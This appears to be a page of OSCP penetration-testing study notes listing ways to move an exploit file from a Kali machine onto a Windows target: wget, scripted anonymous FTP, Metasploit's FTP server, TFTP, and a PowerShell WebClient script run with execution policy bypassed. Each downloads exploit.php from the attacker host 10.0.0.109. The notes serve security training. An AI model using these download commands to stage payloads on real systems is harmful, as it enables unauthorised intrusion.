File transfer type:

1. HTTP

Transfer files through the website.

2.wget

wget http://10.0.0.109/exploit.php

3.FTP

python FTP

(1)Install python FTP on the Kali Linux.

pip3 install pyftpdlib

(2)Move to the target folder, and start the FTP service.

python3 -m pyftpdlib -p

(3)Login the ftp service on Windows 10 anonymously.

(4) Get the file form FTP server.

(5)Exit FTP service.

We can also save the shellcode to txt file.

(1) Execute the following commands to make the ftp command file.

echo open 10.0.0.109 > ftp.txt

echo anonymous>> ftp.txt

echo pass>>ftp.txt

echo binary>> ftp.txt

echo get exploit.php >> ftp.txt

echo bye >> ftp.txt

(2) Get the files from the FTP server.

ftp -s:ftp.txt

4.Metasploit

(1) Start the metasploit.

(2) Initiate the FTP service,.

use auxiliary/server/ftp

show options

exploit

(3) Stop the FTP service.

5.TFTP

(1)Start the TFTP service on Kali Linux.

atftpd --daemon --port  /var/www/html

(2) Get the file from tftp server.

tftp -i 10.0.0.109 get exploit.php

6.Powershell

(1) Make the powershell file to get the file form Kali server.

echo $storage = $pwd > get.ps1

echo $webclient = New-Object System.Net.Webclient >> get.ps1

echo $url = "http://10.0.0.109/exploit.php" >> get.ps1

echo $file = "exploit.php" >> get.ps1

echo $webclient.DownloadFile($url,$file) >> get.ps1

(2)Execute the powershell code.

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1

OSCP Learning Notes - File Transfers(1)的更多相关文章

  1. OSCP Learning Notes - File Transfers(3)

    Metasploit Attack Target Server: IE8 on WinXP 1.Start the Metasploit. setoolkit 2.Select 2)Website A ...

  2. OSCP Learning Notes - File Transfers(2)

    Metasploit Target Server: Kioptrix Level 1 (1) Start the Metasploit on Kali Linux. (2) Set the modul ...

  3. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  4. OSCP Learning Notes - Buffer Overflows(1)

    Introduction to Buffer Overflows Anatomy of Memory Anatomy of the Stack Fuzzing Tools: Vulnserver -  ...

  5. OSCP Learning Notes - Enumeration(3)

    SMB Enumeration 1. Set the smb configurations. locate smb.conf vim /etc/samba/smb.conf Insert the gl ...

  6. OSCP Learning Notes - Kali Linux

    Install Kali Linux : https://www.kali.org/ Common Commands: pwd man ls ls -la cd mkdir rmdir cp mv l ...

  7. OSCP Learning Notes - Exploit(8)

    Tools: 3. hydra Hydra v8.9.1 (c) 2019 by van Hauser/THC - Please do not use in military or secret se ...

  8. OSCP Learning Notes - Exploit(7)

    Pre-Exploit Password Attacks Tools: 1. ncrack Ncrack 0.6 ( http://ncrack.org )Usage: ncrack [Options ...

  9. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

随机推荐

  1. 安卓开发-Activity-多个Activity的开发方法。

    原文链接:https://blog.csdn.net/weixin_38420342/article/details/84344496 一.切换Activity的5种方式 Intent intent ...

  2. 使用Jmeter如何测试下载接口

    性能测试过程中,有时候需要对下载类的功能做压测,有些同学没有这方面的测试经验,比较迷茫,本文简单介绍下如何测试下载类的请求1.首先使用fiddler抓包,知道是一个http类型的请求,有一个post请 ...

  3. 史上最经典的git教程

    原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 .作者信息和本声明.否则将追究法律责任.http://wsyht90.blog.51cto.com/9014030/1832284 文档 ...

  4. Linux软件服务管理

    学习该课程之前先学习linux的软件安装管理 1.linux的运行级别有下面几种类型 在后面的服务启动管理之中会被使用到 [root@weiyuan httpd-2.4.20]# runlevel N ...

  5. android handle详解

    我们来看一个简单的代码: package com.mly.panhouye.handlerdemo; import android.content.Intent; import android.os. ...

  6. npm -v 报错:Error: EPERM: operation not permitted, mkdir 'C:\soft\nodejs'

    npm -v 报错:Error: EPERM: operation not permitted, mkdir 'C:\soft\nodejs' 起因:原本安装node在C盘soft文件夹下,按node ...

  7. 云服务器终端命令显示-bash-4.2#怎么解决

    原因:删除了root/.bashrc 和 root/.bash_profile两个文件的丢失 解决办法: -bash-4.2# cp /etc/skel/.bashrc /root/ -bash-4. ...

  8. jQuery动态生成<select>下拉框

    前一阵在项目里需要动态生成下拉框,找了一下用jQuery实现比较方便,这里整理一下. 下文所述方法只是本人在项目中遇到问题的解决方法,场景较为简单,也希望能帮助有需要的朋友 1.动态生成下拉框的两种方 ...

  9. Python-使用tkinter实现的摇骰子小游戏

    贴吧看到的一个求助题,大致需求是:3个人摇骰子,每人摇3次,点数之和最大的获胜,支持玩家名称输入.我觉得这个题目挺有意思的,做了个界面程序,欢迎大家交流指正~ #!usr/bin/env python ...

  10. Android 错误异常之Error:Unable to resolve dependency for ':app@debug/compileClasspath': Could。。。。

    这个错误一般出现在导入别人的项目的时候出现的, 我出错原因是,as版本3.5.2用了几个月感觉不如3.0.1的带劲,so 该到了3.0.1 ,出现了这个错, 之前也遇到过,基本都是gradle版本的错 ...